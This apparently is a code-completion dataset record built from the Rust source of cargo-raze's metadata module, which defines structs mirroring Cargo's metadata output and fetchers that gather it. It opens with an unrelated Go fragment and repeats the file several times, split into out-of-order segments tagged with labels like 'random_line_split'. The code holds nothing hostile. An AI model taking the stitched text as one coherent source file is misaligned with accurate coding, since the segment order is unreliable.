UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
} | "errors" | random_line_split |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency { | source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_with_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
}
} | name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id | random_line_split |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency {
name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_with_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() |
}
| {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
} | identifier_body |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
